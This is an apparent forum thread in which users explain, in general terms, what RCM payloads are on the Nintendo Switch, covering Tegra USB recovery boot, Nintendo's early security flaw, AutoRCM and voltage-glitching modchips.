About payloads?

[MrFromthedepths4]

So I’m curious about the rmc but I’m not entirely sure what payloads do and how to use them I can’t seem to find any actual details on what it does. Does it work like an action replay/gameshark for games ? Every time I see something about the rcm loader they briefly mention payloads and they never talk about what it does

 

[thesjaakspoiler]

RCM is the ReCovery Mode for Tegra chips.
The Tegra boots from a small program inside the Tegra and has a number of boot options.
Usually the Tegra boots from the eMMC (NAND flash memory chip) but in case that gets corrupted, Tegra chips have a feature where they can boot from a bootloader send over the USB port as well.
That USB boot mode is not enabled by default.
To active booting from USB, 1 pin from the joycon connector needs to be connected to the ground and you need to push down the volume - button.
That signals the Tegra to wait for a boot program to be send over USB.
This is the'payload' that people are talking about.
The Tegra reads this payload and executes it.
This for example enabled the Tegra to repair the eMMC memory or initialize it in the factory.
Nintendo left this standard recovery mode on in the first series of Switches.
Usually this would not be much of a problem as there are several security features that will prevent unofficial boot loaders from starting up the system with system admin rights.
But that is where Nintendo also made another mistake with their security model and this enabled some smart guys to create their own bootloader and start up the OS that is on the Switch with special rights so they could enable Homebrew apps.
In later models, Nintendo fixed the security model and although you can still inject your own bootloader, it is not possible to start up the operating system on the Switch with privileged rights.
Only with a hardware modchip from SX, you can bypass this fix from Nintendo.
The SX modchip is pretty complex and uses voltage glitching to gain access to the security model of the Switch.
This idea came from the PS-Vita and Yifan Lu wrote a whole scientific paper on it.
https://yifan.lu/2019/01/10/injecting-software-vulnerabilities-with-voltage-glitching/
Soon after this paper, the SX modchip appeared on the scene.

With AutoRCM, the booting process is purposely corrupted, forcing the Tegra to boot with an USB payload.
With this hack, you won't need to ground that joycon pin or hold the volume down.
You can just inject the payload through USB.
That saved 1 step in the process.

 

[Draxzelex]

So I’m curious about the rmc but I’m not entirely sure what payloads do and how to use them I can’t seem to find any actual details on what it does. Does it work like an action replay/gameshark for games ? Every time I see something about the rcm loader they briefly mention payloads and they never talk about what it does

Payloads cause a buffer overflow which inadvertently causes the console to read any code afterwards as legitimate allowing users to fully exploit the console.